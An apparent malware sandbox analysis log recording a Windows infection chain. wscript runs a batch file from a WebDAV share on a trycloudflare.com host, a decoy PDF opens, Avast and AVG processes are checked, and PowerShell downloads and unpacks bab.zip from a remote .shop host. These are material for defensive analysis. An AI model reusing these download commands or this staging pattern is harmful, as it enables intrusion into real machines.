      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\IPKGELNTQY.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\IPKGELNTQY.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      barindex
      Opens network shares
      Source: C:\Windows\System32\wscript.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs
      Source: C:\Windows\System32\wscript.exeFile opened: \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs
